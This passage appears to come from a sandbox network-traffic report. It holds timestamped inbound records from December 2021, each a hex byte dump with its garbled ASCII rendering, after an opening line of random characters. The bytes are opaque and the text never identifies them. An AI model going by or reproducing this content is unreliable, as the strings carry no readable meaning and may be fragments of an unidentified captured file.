v%9=EBeO(_&0R5Q[QT.@U#1e_JFo5C4[Yu4vvw;!~Z7o1<7A<ge *-Hb05l$0)fvFhsa6V3
2021-12-14 11:52:59 UTC	51	IN	Data Raw: f4 31 e5 c3 2d ec 69 af f0 b4 c2 0c ca a0 f3 ea 62 32 3a 3a a2 c9 6b 79 a8 c9 0c 65 b3 a0 ff 5a c0 20 2e bf 15 51 df 7a 4c db ed ec b6 cc 70 21 42 e4 45 c9 9c 31 b2 ae 46 69 e2 a1 86 27 d3 4c 94 00 43 e3 70 62 27 7a b3 93 b6 27 26 e4 dc f6 ca 29 48 5d 03 ea fd 4d 1a b0 1c 33 18 4f cb cb 85 a4 b7 f5 02 16 17 78 28 b1 7e 1d a4 64 04 81 30 ad b8 8d 91 e8 31 f4 0d 2b 5f 86 37 00 bd 87 15 b7 80 6d 41 36 76 5d 0c d9 dc b2 be ac 09 cc 23 43 73 0b b2 b6 65 71 ae 23 d7 d0 5f ba 65 8c dc 02 c6 14 37 d8 55 51 50 84 5a f0 a1 06 44 b0 ed 31 60 8c db 01 90 77 18 34 76 da 2c 63 e0 e1 db d5 bb 4a 90 f3 cc 7c 39 c0 68 f2 a4 1a b8 b6 e7 31 fb 13 ba 06 7e 91 74 d9 9e 61 d4 e0 ad d1 d8 d5 63 85 46 f4 18 0f 33 15 76 4d 7b 01 c1 a5 d8 17 ea 80 49 66 49 ec 2b 96 68 dc bd 67 c6 Data Ascii: 1-ib2::kyeZ .QzLp!BE1Fi'LCpb'z'&)H]M3Ox(~d01+_7mA6v]#Cseq#_e7UQPZD1`w4v,cJ\|9h1~tacF3vM{IfI+hg
2021-12-14 11:52:59 UTC	53	IN	Data Raw: 12 ae a8 84 bf 21 c4 c9 ee e6 d5 5a e3 7d 43 00 a1 fe 5a 26 91 23 84 92 38 88 9a fa 06 89 5d 27 d4 2f 47 a4 1c d6 30 a0 76 e3 c8 4c 9e cf 18 bd 49 f6 20 fb 09 70 5a 0a c5 9c 99 df cb 4b 0c 14 1b d6 18 a8 6c a4 c4 9f a3 ed a4 0a af c0 d5 52 bd 9c 6a 3a 7a 09 c0 a6 fa 28 cf 17 de b3 89 e2 fb 73 30 48 d3 40 ab 24 82 be ef 76 cd 19 21 a1 b1 26 b4 ea 35 49 6d f7 01 42 c3 db 24 07 ee f2 c7 f6 66 4f 5a 01 3e 5e 57 cc 78 1e 72 52 06 23 9f f6 4b 6c f8 1d d0 f3 ae 4a 51 e9 9a f9 69 91 a2 80 08 2a 11 5d 9d 02 54 9a 86 fd fc 94 23 20 e2 3b 65 b6 69 fa 84 99 ae 77 5d dd 49 49 46 4d 9c 9d 0f a9 5b 3c 73 87 19 f2 ec 10 13 95 79 5a b1 a4 bb 6e 1b d5 ea 09 1f f6 18 f1 81 b6 0d ae 23 5a 7b 1f 0f af 06 9f 60 d2 9b 87 80 99 9b 67 82 d5 7a 30 fb aa c6 01 34 d9 f7 a0 26 9d 83 Data Ascii: !Z}CZ&#8]'/G0vLI pZKlRj:z(s0H@$v!&5ImB$fOZ>^WxrR#KlJQi*]T# ;eiw]IIFM[<syZn#Z{`gz04&
2021-12-14 11:52:59 UTC	54	IN	Data Raw: de 61 fa c6 5f 11 cc c3 03 bd 64 04 98 28 2a 79 5c e2 fe fd ac d8 97 3a 2e 21 0f 8a 57 ef 9b 2d ef 3b fc 14 d9 46 6e 99 7a 8a 56 38 13 c0 56 50 98 c6 ad 73 6b b5 b1 63 6e f2 e6 e7 59 9e 0c 5d d2 cb 18 df 86 2e ed 50 4b e4 a5 c0 08 d0 9f 9c 3f 63 38 27 88 52 21 68 73 86 12 19 4d f2 a9 e8 86 c1 92 95 9a 17 5b f1 b3 48 f3 0d 8e 9e 1c 1e bc 48 cc 98 e4 ad 2a 9c 66 42 41 02 aa 91 f7 d8 07 b0 56 4e f4 ac 66 b1 43 54 81 a6 10 84 e3 f3 de 02 29 42 41 8f f1 fc 92 6c c5 16 ad 18 49 d2 ae b2 ac 9f 3c 2a 25 00 12 28 5f 7d 1b b3 01 88 86 5f 83 96 a8 86 ff 2a e0 21 a8 7a 84 31 13 ba a5 7a 66 83 67 50 c3 74 b4 0f df dc b6 a2 eb 56 cc 23 43 74 9f b2 57 67 71 a2 08 7c 06 4d 46 bb 9c a2 26 b1 2f 31 de 45 7b 33 8d 55 85 90 17 4e de 45 66 60 86 eb 16 b0 9d c2 c2 57 cb 26 1c Data Ascii: a_d(y\:.!W-;FnzV8VPskcnY].PK?c8'R!hsM[HHfBAVNfCT)BAlI<%(_}_!z1zfgPtV#CtWgq\|MF&/1E{3UNEf`W&
2021-12-14 11:52:59 UTC	55	IN	Data Raw: 33 e6 19 1a 73 53 41 6e fd 3a ca 5f f1 d6 23 18 37 5c 29 a5 76 dd 0a 85 6f dc 80 19 6c a6 79 64 b8 cd 90 4b e8 f3 46 40 02 3c 2c 24 76 4c 36 be db 4f c7 72 be 27 97 16 5a b5 2a 94 9d a8 6f ee 1a 7c 08 ff 84 b5 33 26 bb e7 f1 03 56 f3 7f 59 11 b9 62 f2 13 96 dc 57 64 de 45 bd d2 31 96 56 3e d5 28 25 0c 03 f2 c4 aa 72 cb d9 44 bc 13 1e bb 65 9e 20 f9 48 3a 45 2f d6 8e 99 ce b1 54 2d ea 69 fa 14 b9 bf ac ab b7 ad ed a2 15 97 d3 c7 53 ae 8e 75 37 bf 08 ec ae 51 21 dc 06 34 bd 9a f0 ed 62 22 57 c2 be aa 08 9f af e4 61 46 46 21 a1 a8 34 bb fb 24 5e 72 ca 89 53 cc b4 72 06 ee f9 cf cc 7a 5d 09 12 3e 4f 34 d3 5d f1 00 c4 0a 25 84 f4 5a 48 f9 1d d0 c4 50 5a 43 ef 9c 84 4b 9e 5c 8b 09 2b 3c 15 5f 0d 46 88 86 32 fa ae 2b e9 e3 17 64 d6 4f fe 8f b7 85 7f 42 f6 87 52 Data Ascii: 3sSAn:_#7\)volydKF@<,$vL6Or'Z*o\|3&VYbWdE1V>(%rDe H:E/T-iSu7Q!4b"WaFF!4$^rSrz]>O4]%ZHPZCK\+<_F2+dOBR
2021-12-14 11:52:59 UTC	56	IN	Data Raw: 06 dc 4f e4 cf 02 55 17 bb 3d bb 66 2a cc e2 1a 8a 32 13 43 af 47 ec 71 fa 9b 6c 53 c2 fd 72 35 02 74 55 4e 1c be a1 ac 35 a4 2e 6a 0e b7 75 ed fd 6e 4a 1e d5 a0 ab c9 1d ff 1b 5d dd fa ba 79 eb d9 5c d2 8b 5e 1b d0 4a 20 4e 76 0f 10 8e 37 8b a9 f6 ed eb 81 14 bf 7d 2f 30 0e 8c dd 5d 54 26 eb 3d ef 6d 0e 01 6f 93 61 97 dd 00 ae e8 5f 5e f7 e8 c0 95 6c a4 be 5d 78 f3 b9 cd 2e 12 07 4c c8 7d 2b df 8b 2e f8 e2 cc 2e a5 c6 17 de 6d b4 cc 63 32 3a 1e 6b c3 7a 63 1a 2f 05 61 b5 ae 87 73 d7 08 f0 af 1e 4a e7 b5 9b 41 cf 86 9a 1a 77 4e b7 cc 92 c2 c3 17 ef 66 4c 78 f8 33 87 e0 c6 00 88 8b 20 3d a6 71 21 7c 65 ed 54 16 91 ff c8 9c 12 22 59 47 02 0f 65 85 7d c8 2f 21 0f 9f 42 ae 5d ae 9f 30 19 cc 7e e5 00 b3 74 08 b3 1d 37 84 5f 8f a9 9c 86 fc 54 2c 09 44 73 9e 06 Data Ascii: OU=f*2CGqlSr5tUN5.junJ]y\^J Nv7}/0]T&=moa_^l]x.L}+..mc2:kzc/asJAwNfLx3 =q!\|eT"YGe}/!B]0~t7_T,Ds
2021-12-14 11:52:59 UTC	58	IN	Data Raw: 2d 49 34 79 49 b9 07 f7 ab 91 83 21 be a6 dc 82 51 2b e0 76 6a be c7 c8 ac 79 45 cb 37 14 10 7b e2 4b 8b bc 98 5a 33 ec 80 3f eb 39 ef 0f 0d cf c8 9e 4c 6a e6 a9 1a 0f f1 38 ad 4f ae e5 75 fe 30 58 e5 19 6c 0b 53 50 0c 51 29 d8 6d a0 fd 9a 1a 37 4b 13 72 7a 23 01 81 68 c9 87 08 c9 40 7b 64 bf f6 57 5a e7 ef 71 60 9b 2d 25 63 1e 4d 36 be de 6e 32 7e ad 3f bf 20 48 aa 37 79 99 95 7b d7 27 13 c1 f5 a9 b4 58 a2 d8 e6 fb 08 94 36 6c 4b 11 b9 75 c5 45 68 dd 7d 60 ef b5 5c d1 31 8f 75 c9 c4 28 32 36 41 d6 3a ad 4d df c1 64 72 12 1a bd 4b 16 09 fb 4e 14 07 0a c5 9a 8a d9 aa 63 e4 17 68 d0 30 41 b4 a4 c2 b7 f2 ed a4 0c a6 c8 dc 7b a3 98 6a 3c 69 14 c4 a6 46 00 92 17 2b b5 9a e5 e4 5b 2e 4c d3 46 83 3b 86 be e9 5e 96 19 21 a7 a5 36 bc c2 05 4a 6d f1 02 6a ed db 3e Data Ascii: -I4yI!Q+vjyE7{KZ3?9Lj8Ou0XlSPQ)m7Krz#h@{dWZq`-%cM6n2~? H7y{'X6lKuEh}`\1u(26A:MdrKNch0A{j<iF+[.LF;^!6Jmj>
2021-12-14 11:52:59 UTC	59	IN	Data Raw: c3 85 89 65 1e ad e4 08 66 06 ce 4f 9b 40 b4 20 9a ef 94 7a 75 bf 71 b0 36 bb a5 13 d2 93 ad 1f f1 52 5c 9e 08 c0 d2 db 0b bd b7 e3 2d 5c 30 37 90 22 47 6b 89 7c 52 1c 4a 0e 61 4f 02 1f 01 bd cf 00 c0 4f db cf 02 55 12 91 29 be 44 bc e1 e1 1c 94 ae 18 52 a1 dc d7 5e eb 93 70 5b d9 ea aa ae eb 67 5b 5e b0 be bf 85 50 4a d7 43 04 ac 1c 1a 26 e2 7f 09 58 fe 09 d8 14 f8 1a 58 e0 4f a5 74 7c e0 58 bd c7 55 08 dd 48 2f 70 fb 04 9e 33 30 41 92 0d ff fb b3 df b9 a7 38 fb 1a b2 dc c0 54 b2 ef 3d e3 1d e1 29 83 98 70 96 1a 0f 0d 9d 8c 49 f2 e6 be 76 45 49 b5 4b 8c 7d b9 e1 36 02 24 6b d9 e7 37 c2 91 39 ff ae b0 e1 b4 c0 0c cf 89 e5 c1 9c cd 38 3a e6 c8 6b 79 8a d9 1d 4d 82 a8 e8 86 ff 26 f8 be 13 51 df 9a 4d db ed 53 9e 1c 5b 21 48 8d 8e c8 9c 3b 9a 77 47 69 e8 a9 Data Ascii: efO@ zuq6R\-\07"Gk\|RJaOOU)DR^p[g[^PJC&XXOt\|XUH/p30A8T=)pIvEIK}6$k798:kyM&QMS[!H;wGi
2021-12-14 11:52:59 UTC	60	IN	Data Raw: eb 5a 8d e0 ac be ec d4 63 8f 26 e4 11 18 f3 06 7f 5c 72 10 cb 2b 6f 28 6f 7e b0 99 4e c6 e5 97 29 e8 69 66 c6 00 87 e7 b0 5a 1a b3 03 6a 78 a4 58 e9 50 d6 9a 5c 9f b2 32 dd 43 30 84 44 c3 28 74 3c 41 23 92 5b b1 16 66 bb 9a bd 48 41 59 23 5c 44 0e c8 5a 5a ba cd 9a a7 0a ff 4b 37 1e 0a 20 60 4b 8b bc 4d 70 75 c2 87 13 e6 11 af 1b 0d c9 c2 97 62 28 05 44 1c 32 c5 3a ad 48 9d 3d 70 fe 13 71 79 19 1a 01 40 47 76 c3 be db 67 ac fd 0d 1a 37 4b 13 52 7b 23 01 81 ee cd 87 04 f2 fd 7f 4c 49 dd 9f 5c cf cb 5b 7b 99 05 cb 4a 3a 47 1e 28 c8 46 d2 6c aa 33 bf 90 4b aa 3b 42 b2 86 7e f9 3e fb c0 ff 8e 97 b7 18 d8 ec e2 06 58 ed 44 65 13 a8 76 fb 31 46 dd 7b 67 f0 63 be c3 36 a1 73 2f c7 2e 22 36 32 d6 3a a1 48 25 c9 13 b8 16 0e b7 be 56 0a fb 48 2d 5c 22 eb 9e 99 d9 Data Ascii: Zc&\r+o(o~N)ifZjxXP\2C0D(t<A#[fHAY#\DZZK7 `KMpub(D2:H=pqy@Gvg7KR{#LI\[{J:G(Fl3K;B~>XDev1F{gc6s/."62:H%VH-\"
2021-12-14 11:52:59 UTC	61	IN	Data Raw: 0b f5 81 3f 13 9c f0 56 63 85 09 2c 48 92 fa c0 8d ed ad 8d 8d 7b 37 1d 6d 5f b1 ba c3 23 07 43 e4 a1 20 f8 d1 24 ed c9 d1 2a 35 eb 50 31 97 af 79 20 20 3b ff f5 4d bb 4f c8 c4 50 c0 35 6d 22 d6 ef 21 83 4d e4 85 be 0e 6d 1d d1 50 12 6e 5c 9b 9a e9 bc 5d 63 97 c9 dc 4e bd bd 94 d9 82 a9 71 2b 5a 4d 9c 09 2f d6 c4 bc f8 88 e3 27 4a 6c 24 c7 19 6b 94 94 7e 52 1b fb 12 78 56 1e 64 01 1c cf 06 db 6a db cb 6d 7b 03 95 28 bb 61 05 8d c7 18 8c 25 0e 5f 89 94 c0 56 fc f4 4c 42 c8 ea 7a 33 d9 08 43 5e 12 a5 69 87 69 73 e6 95 1f b7 09 c2 8f d4 40 09 52 f2 83 f1 1c ec 04 92 f1 fd b4 63 a0 db 58 ac d6 4e 09 54 ee 14 80 99 fb 61 28 29 46 6c f2 f8 ea bf df af 43 a4 df fa 62 13 d2 59 06 d8 3d e9 08 e2 0e 1c 23 70 9c c6 1d 1c f8 56 5a fd 30 ad 75 47 ad 9e 4b 86 b0 d2 e1 Data Ascii: ?Vc,H{7m_#C $*5P1y ;MOP5m"!MmPn\]cNq+ZM/'Jl$k~RxVdjm{(a%_VLBz3C^iis@RcXNTa()FlCbY=#pVZ0uGK
2021-12-14 11:52:59 UTC	63	IN	Data Raw: 18 66 2e a0 45 bb cf cd 8e 64 2f 3b c2 54 7d 5d 97 54 bf 9a b1 b5 b1 8c 66 60 8c d1 c6 7e 6a 3d 58 42 da 2c ee f3 ec b9 47 f1 4b 9a f2 e6 6c 50 c1 62 26 c9 06 93 b1 c7 22 ff 02 ff 1a 89 91 76 df 93 7e d9 6d 86 d1 bb d5 70 82 eb f2 0e 2f d6 15 76 4d e7 10 c6 b2 c7 31 76 91 48 7e 69 6d e5 97 68 40 78 61 df 20 43 e7 cd 5a 86 a2 fb 70 67 9d b8 f9 57 cd b5 da 9f b2 28 41 52 36 9a 64 18 28 28 3c dd 32 a8 47 91 84 ff ba 9a 21 4f 46 47 3c 2d d8 1f cf 5e 63 9e 6e db a6 0a 63 da 30 01 11 73 63 4b 8b b6 da 49 32 d9 8c 35 0d 39 ee 1f 91 de cf 81 46 75 52 d8 0b 1d f4 35 b2 34 29 c4 76 e1 17 79 70 19 1a 0b cf 50 78 f4 26 c7 1b 36 c4 24 07 27 5b a7 ab 7d 3c 1a bf ee dc 80 11 f3 ef e5 75 be c1 8c 4c 7b f4 5e 64 8b 3b bf 5a 3d 52 23 a2 54 57 df 60 bb 15 68 07 48 aa a1 7b Data Ascii: f.Ed/;T}]Tf`~j=XB,GKlPb&"v~mp/vM1vH~imh@xa CZpgW(AR6d((<2G!OFG<-^cnc0scKI259FuR54)vypPx&6$'[}<uL{^d;Z=R#TW`hH{
2021-12-14 11:52:59 UTC	64	IN	Data Raw: 48 51 e5 86 8d 59 91 ab 93 db 2c 3b 46 42 0a 53 8c 84 ad 5f a6 d1 3f da 3a 6f af 77 f1 8f b8 80 89 5c fb 96 57 4a 4d 95 ff cd a8 77 34 70 5a 22 85 15 f8 83 af 53 5a bb b3 83 08 af b8 e9 03 12 75 0b ff 86 d6 ba 96 e1 50 71 05 93 ba 17 92 fb d2 87 e8 a5 8f e5 51 aa 0c 73 18 ab bf c3 2f 7f 6a f6 aa 3b 50 af f4 fa b7 e7 3c cb e3 69 6d fc 66 7f 4f 99 2c 01 fd b0 86 73 c1 b1 44 30 35 67 0c 9d ef 30 8f 0a a7 84 be 02 c4 1d c4 5f f6 7a 8c 99 90 c7 cd 77 61 91 a0 00 37 bd b7 3c c4 8a a1 16 f1 4b 5b 85 0e e9 0a c1 d3 31 99 f2 3c 4d 08 2b 91 0c 93 e5 b6 7c 5b 72 5c 1e 69 51 05 18 3f 0d dd 38 7b 65 ca cf 13 4c 10 87 b4 b9 68 0b f3 e5 75 3f 22 1f 58 b2 d8 b7 32 fb 9b 6c 53 ce fd 79 0a 8e 63 5b 59 7d 1a b6 92 46 4f 2f 94 09 43 1b dd f9 46 1b 0d 58 f9 c4 7c 1d ec 04 58 Data Ascii: HQY,;FBS_?:ow\WJMw4pZ"SZuPqQs/j;P<imfO,sD05g0_zwa7<K[1<M+\|[r\iQ?8{eLhu?"X2lSyc[Y}FO/CFX\|X
2021-12-14 11:52:59 UTC	65	IN	Data Raw: 6c c9 51 10 19 49 d2 e9 f3 aa 9f 3c 29 32 11 17 0a 9b f3 1a b5 64 19 ad 66 96 a6 a5 2c f9 3b ef 66 65 78 84 3d 2e c4 89 3d 61 ab 49 47 59 56 77 23 df da a9 98 df 0e d1 0b f2 62 05 d7 1e 44 70 a4 13 52 46 a4 45 bd b2 e9 0c b3 25 1f 55 55 7d 56 99 5d 0b 2d 0e ca 06 54 71 4f 87 a2 67 4e 62 37 17 9c b3 2a 69 f3 e5 26 d8 b3 c4 2d 2e f3 9e 2e 16 ef 39 a6 1c 93 a2 c9 38 75 a4 ed 03 55 87 7f 57 29 76 57 f3 b3 c2 b1 ff 7a 94 fe e4 12 06 34 1f ec 65 12 05 c1 a3 f0 33 ea 80 45 c4 58 e6 f2 41 7b d6 78 6c d7 1e b6 06 c5 d4 ad a5 cd 5d 6e b7 2f e1 de 61 84 58 11 05 3f 07 50 2e 95 48 e8 37 39 38 50 2f a7 4b ba 8c d7 d0 9e bd 58 69 7d 23 5c 4e ac d9 4a 7d 68 de d0 b7 06 e8 1d 24 12 0a 5f cb 54 ba 6d 35 aa 34 c6 8d 06 e2 28 ea 0c 2c d9 db be 72 d8 04 44 1a 0b ca 29 8d d4 Data Ascii: lQI<)2df,;fex=.=aIGYVw#bDpRFE%UU}V]-TqOgNb7*i&-..98uUW)vWz4e3EXA{xl]n/aX?P.H798P/KXi}#\NJ}h$_Tm54(,rD)
2021-12-14 11:52:59 UTC	66	IN	Data Raw: a6 58 ff a1 d6 21 60 31 4c c8 ed b3 5c e9 c9 49 b7 fe f9 18 da 59 3a 57 76 0a 89 b4 28 51 ba e0 ed dd a8 e8 a9 6c 39 ad 3a 9d cd c6 de 3f c9 29 c1 ad f1 01 65 b1 2a 9c cc 1a 1c 2d 57 5a fd c6 78 72 6d ae 9c 6f 86 f1 ec f2 39 12 03 75 b5 e3 3d c8 ef 23 e9 78 a9 ca 84 d7 12 ee d9 df 3e 65 5d 2c 13 7a c2 47 71 ab 16 1e 6a 9d c7 ec 8c d1 67 e6 bf 15 51 ce 66 4d db e7 9c 88 05 78 f7 5b db 83 dc 8a 08 cb 66 51 71 3e ba 86 da 84 00 88 02 68 e5 81 60 0c 04 98 80 a6 10 80 fb cc 14 04 29 48 56 06 fb ee b1 7a d2 29 bd 27 49 d8 c0 36 bf bd 2e 29 b9 11 17 0a 9b 24 1b b5 64 3d 6b 5e 89 b0 a5 40 f8 3b ef 21 60 79 84 3d 69 84 8f 3d 61 92 7a 50 8f 4f 48 1d d1 cd 2e b3 c3 11 cc 30 6f 73 23 cb 60 72 fd 9b 19 7a 2f 02 54 9d 8e e5 a3 b3 2f 3d c7 74 f1 63 95 54 84 8c 2e e9 b1 Data Ascii: X!`1L\IY:Wv(Ql9:?)e*-WZxrmo9u=#x>e],zGqjgQfMx[fQq>h`)HVz)'I6.)$d=k^@;!`y=i=azPOH.0os#`rz/T/=tcT.
2021-12-14 11:52:59 UTC	67	IN	Data Raw: 7a 12 4f 31 3a e2 29 a6 4d a4 dd 69 91 eb 59 e5 13 05 1b 7b ad 7e eb 23 46 76 a2 cd f5 0b 3f 5c 30 ad ac 30 00 b8 79 dc 97 3f 3b f0 f7 d3 ae 04 88 8c 6a da 59 7b 9e 3e 27 5a 3e 5b 3f a2 5c 57 df 1e 33 3c 80 16 4c bd 34 e4 2b 93 a4 d7 0f 12 c1 f5 af 8b 23 96 6f fe 29 14 93 fc ba c6 2e a8 70 ec 0a 64 d5 6d 7c ea 8b b7 5c 86 a1 44 2c c7 22 3c 08 0d da 32 25 e9 d3 46 fb bc 08 1b bb 69 e5 06 ea 44 30 4e 19 c9 95 17 68 ab c5 bb 24 ac df 96 1f a0 7e d3 49 22 d2 a4 0a b4 d3 d0 44 b6 12 dd 2d 9b 1a d1 b5 4d 03 d7 06 2e a2 84 f5 37 7a 21 45 47 48 ba 29 95 64 7b 17 55 08 2c b6 7f 34 b9 fb 26 59 7c c6 f6 53 c6 55 89 10 34 e4 0a 4b 5a 4f 1a 01 2d 58 30 dd 7d 81 b6 f0 dc 30 87 ef 3b 7b aa 0c df ca 78 dd 40 eb 9c 98 c0 4b b4 a5 3d 3c 11 47 4e 0c 50 8b 88 b7 c8 4e 0b 17 Data Ascii: zO1:)MiY{~#Fv?\00y?;jY{>'Z>[?\W3<L4+#o).pdm\|\D,"<2%FiD0Nh$~I"D-M.7z!EGH)d{U,4&Y\|SU4KZO-X0}0;{x@K=<GNPN
2021-12-14 11:52:59 UTC	69	IN	Data Raw: e6 b6 76 50 0b f9 17 17 3c 16 0b 2d 90 78 02 44 d0 e2 d6 03 5f 0b 84 28 bb 64 6d c7 e0 1a 86 2e 16 dc 16 a3 a3 56 fa 9f e8 f7 1e ee f2 95 c3 bd 8d 48 c4 22 9c 92 4c 5a c2 9d 16 ac 12 c5 72 d9 68 2a 59 ff a1 b7 7b ec 0e 48 de fd ad 7d f8 7f 37 da c7 5f 1f 54 ee 03 41 66 04 94 3b 39 40 b2 e8 70 4c c7 a9 bf 7d 2b af b2 4b cf 49 cb 06 f6 3c e9 08 e0 07 7e 91 1f b9 cd 10 3e d3 52 29 de ef af 79 7e ad a5 42 91 9e ca e0 36 09 1d 54 cf 88 10 cf 80 35 f7 60 2e cc a5 c6 1c d5 bd c5 b3 48 32 30 13 69 cd 62 62 8a 0e 81 d2 9d 8b e9 8c dd 19 fe a8 04 51 fe 2c fa c5 cf 94 9f 1a 7b 30 4c d2 83 cd 8a 25 b2 6e 46 69 e2 b8 98 e0 c7 7e b2 10 4f fe b7 78 3a 6e d0 a9 a7 16 9b e4 d2 f6 2d 28 48 5d 1e de fc 85 6f 4d 89 5e 37 48 d8 cb 87 a9 b7 2e 00 16 1b 06 07 dc 64 1a b5 64 19 Data Ascii: vP<-xD_(dm.VH"LZrh*Y{H}7_TAf;9@pL}+KI<~>R)y~B6T5`.H20ibbQ,{0L%nFi~Ox:n-(H]oM^7H.dd
2021-12-14 11:52:59 UTC	70	IN	Data Raw: c0 04 c0 98 a3 2c 4c 45 e7 a6 05 42 28 28 e4 61 52 9e 5a b1 c0 f5 bc b2 a3 5e 41 53 35 74 b9 0f c8 4b 60 af c9 cc 70 19 fb da 33 0f 1e 62 1b 95 99 9e 71 58 35 cc af 3b e9 39 e8 12 25 f7 c8 9e 40 b4 0d 6c 50 1b eb 32 a5 21 af d4 71 f4 33 50 cf 19 1a 0b 52 51 7f eb 29 d8 57 aa 98 5e 18 25 57 3b ba 7b 38 3b a1 72 ef 82 0e e1 6c 79 64 a8 ad 25 5a e7 ef 53 08 61 2c 23 41 36 45 1e c9 cc 46 de 57 d3 31 97 01 60 3d 3e 6a 9a f7 81 fe 16 19 ae ff 86 bf 21 10 f0 99 f5 03 4f c3 ec 4f 11 ae 58 7a 1a 68 db 08 92 e7 9d b5 bd 31 8b 5d 27 cf 00 49 1a 1c d0 12 2a 5a db ce 64 03 12 1a bd 10 0e 0b fb 42 53 5a 08 c5 96 91 f7 dc 4f 0c 12 40 54 1c a8 b1 8c 53 9c af eb d7 f5 b4 c0 df 3c bf 9e 6a 30 49 21 43 a2 40 2e e7 93 2f b3 8f ca 7a 70 30 4e a0 bf aa 24 88 d1 ef 74 cb 13 29 Data Ascii: ,LEB((aRZ^AS5tK`p3bqX5;9%@lP2!q3PRQ)W^%W;{8;rlyd%ZSa,#A6EFW1`=>j!OOXzh1]'I*ZdBSZO@TS<j0I!C@./zp0N$t)
2021-12-14 11:52:59 UTC	71	IN	Data Raw: 2e 03 f7 18 ec 6c db cf 72 5f 1f 6f 24 c3 fa 21 98 75 00 ad 34 0c 66 0a cb cb 8f 46 8c 98 8e fb 80 5b c2 97 cf b9 1e 21 bd 9e df fc 8b 1c e2 5c 5c 87 17 c0 de ac d0 33 88 e9 56 58 90 26 92 5a 77 e5 b6 7a 43 0c c0 31 6b 5b 10 64 0d 1c cf 06 cc 76 db a0 1a 5e 01 9f 3f be 7b d4 f1 f5 0b 98 32 0a dc 16 e2 79 a8 05 64 77 4a df 3a 6f 28 c5 6d 4a 4c 2c f1 49 6d b3 5d fb 95 1f bc 0a cc fc 6e 40 3c 59 31 a8 cb 10 f6 0e 4c c9 ff 95 72 76 e4 4b bd c7 c9 1b da 48 3d 4b 6f 3c 8c 3b 2f 51 ba f0 f6 e4 a9 30 be 51 25 30 03 8a 1b d4 7a 31 fe 2e e1 02 e0 09 70 90 8e 9d e0 1a 25 c7 4a 45 af 72 b0 79 7e ac b4 5a 8e ee e8 1f 37 2f 0b 4b cb e1 22 c1 93 37 e8 69 ab f0 5b c7 31 c5 af c8 36 63 23 38 0d 6f 36 6a 5f 8b 0f 17 0a 99 a9 e8 86 c8 1e e9 b6 15 4a ff bd 47 25 e6 a1 97 0b Data Ascii: .lr_o$!u4fF[!\\3VX&ZwzC1k[dv^?{2ydwJ:o(mJL,Im]n@<Y1LrvKH=Ko<;/Q0Q%0z1.p%JEry~Z7/K"7i[16c#8o6j_JG%
2021-12-14 11:52:59 UTC	72	IN	Data Raw: 3f 1c 92 a0 e5 20 f9 13 f1 26 80 97 7c d8 9e 67 fe f2 af d1 b1 bb 70 87 fa ff 6b b5 25 15 7c 47 64 1b e9 1e d8 17 e0 a8 d9 62 49 ea cd 29 68 dc 63 6d d9 1a af 5c cd 5a 10 9b 6b 6e 78 a2 0c 56 50 d6 9f 50 97 9a 07 dd 43 3b bf e3 c2 28 28 3b 69 12 af 5a bb 3b f8 bc 97 60 c4 40 59 23 5b 37 83 c9 41 6c ad c9 ca a2 22 ab cf 37 18 74 d4 db 4b 8d 9b 41 5e 38 1b fa 14 eb 39 f8 0e 09 a0 40 9f 4a 6c 16 9e 09 15 f8 3d 95 02 b4 d5 71 ef 1d 48 e0 0f 75 82 52 41 79 f8 2f f0 2d ab d5 29 09 33 5c 3e ad 15 aa 0a a9 74 a2 1f 0e e1 f3 6a 63 b1 f6 81 59 e7 e3 48 7d b7 0a 23 4b 30 65 19 b4 c8 4c e1 83 ad 35 97 16 4f 82 3a 6a 9c af 6d f7 07 1b f8 13 84 bf 2b 09 d0 f2 d9 9b 4d eb 6a 5d 9c af 70 ed 18 7c c9 6f 45 45 9d bf d8 25 a1 87 2e c7 2e 22 93 1b d6 3a aa 4a cf dc 64 37 11 Data Ascii: ? &\|gpk%\|GdbI)hcm\ZknxVPPC;((;iZ;`@Y#[7Al"7tKA^89@Jl=qHuRAy/-)3\>tjcYH}#K0eL5O:jm+Mj]p\|oEE%..":Jd7
2021-12-14 11:52:59 UTC	74	IN	Data Raw: 7c 34 68 54 a6 88 10 01 af d4 76 12 1c e1 2b 69 97 a5 00 0a f0 54 64 16 01 fe 8b 83 f4 de 94 d9 4e 99 9b 6d 36 1d 77 2f f6 a4 f4 b5 01 d7 e8 a6 11 67 be ed ed 55 ca 32 d4 e4 61 eb f8 66 79 bc 3b 23 1e f9 32 58 6a d9 cf e4 21 3b 72 2b da dd ac 98 6b 0b 95 a1 79 fa 1d d3 59 99 66 52 99 9a ef 08 62 6f 88 dd ac 48 21 ac 90 ca 80 b2 45 7e 4b 43 89 0a ce b6 5f c2 3f 97 f6 32 65 0e 37 96 2a 49 c7 63 7c 52 1d 74 0e 67 44 01 2b d2 1e cf 00 56 76 c4 d0 1a 7f da 95 2e aa f0 13 ec fe 03 93 47 83 43 af c2 de 76 5c 9b 66 40 54 fd 72 3d cf 78 10 c3 03 a1 a8 8e 6c 88 d1 95 1f 21 0b c2 e3 73 5f 53 c4 ee a5 d6 02 f7 92 5d c6 f3 ba 6b 25 54 58 b3 ca 40 0b 57 72 2b 58 66 17 90 28 21 47 9a 79 fe fb b9 52 ae 73 38 3e 0a 01 dc c9 64 31 87 a1 f8 0c e8 21 a1 99 70 9c 50 01 3a da Data Ascii: \|4hTv+iTdNm6w/gU2afy;#2Xj!;r+kyYfRboH!E~KC_?2e7*Ic\|RtgD+Vv.GCv\f@Tr=xl!s_S]k%TX@Wr+Xf(!GyRs8>d1!pP:
2021-12-14 11:52:59 UTC	75	IN	Data Raw: b5 b9 fb 6a cd 23 49 62 0c ca 8f 64 5d a6 01 77 2e a9 5d 45 9b e1 05 a9 a2 1c d8 54 7c 56 8c 59 85 93 1f ba b0 ae 74 62 8a c7 db c0 d5 52 47 41 da 26 6f 7d 5b 86 66 a1 47 9a f1 ff ba 38 ec 47 2a b0 34 85 b0 cd 3b ec c9 ec e4 f3 ba 76 d9 9f 6a 8f e7 bb d6 35 63 0c de fa f5 12 08 ab a2 58 6e 6f 2b dd a8 d8 1e f0 7e 4e 4a 4d f8 cf 8c 65 dc 60 70 38 01 ab e5 da 57 1a ba e0 94 79 88 26 c3 52 fd 16 5b b5 b2 28 c6 73 38 86 b5 c2 28 28 9c 41 23 be 29 0b 16 ff b0 91 a2 42 69 e2 23 5c 4e 04 ce 69 cb ba cd dd 8e b4 ff cb 3d 6d 02 51 da 41 86 bf 29 42 37 c6 8d 38 e7 11 4c 1b 0d c9 e0 85 48 6a 0b 43 30 13 c3 9b a9 4e b3 ba 6d fc 19 53 f6 15 0c 18 58 79 e3 ea 29 d8 76 a6 c4 28 82 24 49 2a 